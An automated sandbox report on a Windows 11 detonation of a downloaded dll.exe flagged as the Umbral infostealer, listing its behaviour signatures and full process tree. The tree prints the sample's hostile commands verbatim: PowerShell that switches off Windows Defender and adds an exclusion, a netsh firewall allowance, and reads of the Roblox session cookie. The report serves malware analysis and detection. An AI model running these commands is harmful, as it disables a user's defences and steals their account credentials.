Analysis
max time kernel: 107s
max time network: 151s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 25-05-2024 22:56
Static task: static1
URLScan task: urlscan1
Signatures
Detect Umbral payload 2 IoCs
  resource | yara_rule
  behavioral1/memory/4620-148-0x00000153A4590000-0x00000153A45D0000-memory.dmp | family_umbral
  behavioral1/memory/4620-148-0x00000153A4590000-0x00000153A45D0000-memory.dmp | family_umbral
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  description | pid | Process | procid_target
  PID 4692 created 632 | 4692 | powershell.EXE | 5
  PID 4692 created 632 | 4692 | powershell.EXE | 5
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  pid | Process
  396 | powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs
  description | ioc | Process
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | G-U.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
  pid | Process
  5992 | netsh.exe
Drops startup file 3 IoCs
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\86b75138a95544a28f9d9c36000d93cb.exe | $77-WindowsServices.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\86b75138a95544a28f9d9c36000d93cb.exe | $77-WindowsServices.exe
  File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\86b75138a95544a28f9d9c36000d93cb.exe | taskmgr.exe
Executes dropped EXE 10 IoCs
  pid | Process
  2348 | dll.exe
  2876 | $.exe
  488 | $77.exe
  4620 | G-U.exe
  4716 | $77-WindowsServices.exe
  2348 | dll.exe
  2876 | $.exe
  488 | $77.exe
  4620 | G-U.exe
  4716 | $77-WindowsServices.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials and other sensitive data.
Adds Run key to start application 2 TTPs 2 IoCs
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\86b75138a95544a28f9d9c36000d93cb = "\"C:\\Users\\Admin\\$77-WindowsServices.exe\" .." | $77-WindowsServices.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\86b75138a95544a28f9d9c36000d93cb = "\"C:\\Users\\Admin\\$77-WindowsServices.exe\" .." | $77-WindowsServices.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  flow | ioc
  1 | discord.com
  29 | discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP address.
  flow | ioc
  11 | ip-api.com
Drops file in System32 directory 6 IoCs
  description | ioc | Process
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
Suspicious use of SetThreadContext 2 IoCs
  description | pid | Process | procid_target
  PID 4692 set thread context of 3984 | 4692 | powershell.EXE | 128
  PID 4692 set thread context of 3984 | 4692 | powershell.EXE | 128
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine the installed video card.
  pid | Process
  5028 | wmic.exe
Enumerates system info in registry 2 TTPs 3 IoCs
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Modifies data under HKEY_USERS 55 IoCs
NTFS ADS 3 IoCs
  description | ioc | Process
  File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 405223.crdownload:SmartScreen | msedge.exe
  File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 442283.crdownload:SmartScreen | msedge.exe
  File opened for modification | C:\Users\Admin\Downloads\dll.exe:Zone.Identifier | msedge.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  pid | Process
  3320 | Explorer.EXE
  3320 | Explorer.EXE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 64 IoCs
Suspicious use of SendNotifyMessage 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\system32\winlogon.exe
  cmd: winlogon.exe
  PID: 632
  - C:\Windows\system32\dwm.exe
    cmd: "dwm.exe"
    PID: 556
  - C:\Windows\System32\dllhost.exe
    cmd: C:\Windows\System32\dllhost.exe /Processid:{1469827a-cc20-4e2d-bc32-8091d9360f44}
    PID: 3984
- C:\Windows\system32\lsass.exe
  cmd: C:\Windows\system32\lsass.exe
  PID: 692
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
  PID: 996
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
  PID: 436
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
  PID: 1044
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
  PID: 1060
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
  PID: 1080
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
  PID: 1192
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
  PID: 1268
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  PID: 1280
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "<obfuscated PowerShell script omitted>"
    signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
    PID: 4692
    - C:\Windows\System32\Conhost.exe
      cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 3424
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
  PID: 1368
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  signatures: Drops file in System32 directory
  PID: 1376
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
  PID: 1392
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
  PID: 1476
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
  PID: 1496
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  PID: 1552
  - C:\Windows\system32\sihost.exe
    cmd: sihost.exe
    PID: 2952
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
  PID: 1660
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
  PID: 1760
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k NetworkService -p
  PID: 1780
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  PID: 1820
  - C:\Windows\system32\AUDIODG.EXE
    cmd: C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004E4
    PID: 5728
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
  PID: 1904
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
  PID: 2016
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  PID: 2024
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
  PID: 2040
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
  PID: 2052
- C:\Windows\System32\spoolsv.exe
  cmd: C:\Windows\System32\spoolsv.exe
  PID: 2152
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
  PID: 2252
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
  PID: 2380
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
  PID: 2540
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
  PID: 2548
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k NetworkService -p
  PID: 2584
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
  PID: 2660
- C:\Windows\sysmon.exe
  cmd: C:\Windows\sysmon.exe
  PID: 2688
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
  PID: 2724
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  PID: 2732
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
  PID: 2740
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
  PID: 1136
- C:\Windows\system32\wbem\unsecapp.exe
  cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 3140
- C:\Windows\Explorer.EXE
  cmd: C:\Windows\Explorer.EXE
  signatures: Suspicious behavior: GetForegroundWindowSpam
  PID: 3320
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/ZQ1rrZ
    signatures: Enumerates system info in registry; NTFS ADS; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
    PID: 4072
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8a21d3cb8,0x7ff8a21d3cc8,0x7ff8a21d3cd8
      PID: 900
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
      PID: 992
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:23⤵PID:992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:4420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:83⤵PID:4432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:13⤵PID:4672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:13⤵PID:2096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:13⤵PID:4924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:13⤵PID:2596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:13⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:13⤵PID:884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5632 /prefetch:83⤵PID:2216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3484 /prefetch:83⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4428 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:83⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4832
-
-
C:\Users\Admin\Downloads\dll.exe"C:\Users\Admin\Downloads\dll.exe"3⤵
- Executes dropped EXE
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\$.exe"C:\Users\Admin\AppData\Local\Temp\$.exe"4⤵
- Executes dropped EXE
PID:2876
-
-
C:\Users\Admin\AppData\Local\Temp\$77.exe"C:\Users\Admin\AppData\Local\Temp\$77.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:488 -
C:\Users\Admin\$77-WindowsServices.exe"C:\Users\Admin\$77-WindowsServices.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:4716 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\$77-WindowsServices.exe" "$77-WindowsServices.exe" ENABLE6⤵
- Modifies Windows Firewall
PID:5992 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:6000
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\G-U.exe"C:\Users\Admin\AppData\Local\Temp\G-U.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4620 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\G-U.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵PID:4776
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵PID:3012
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:5028
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:13⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:13⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:13⤵PID:1912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:13⤵PID:1020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4888 /prefetch:23⤵PID:2144
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3740
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3496
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3840
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3904
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3996
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3300
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1596
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4224
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4428
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1968
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1180
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2348
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1604
-
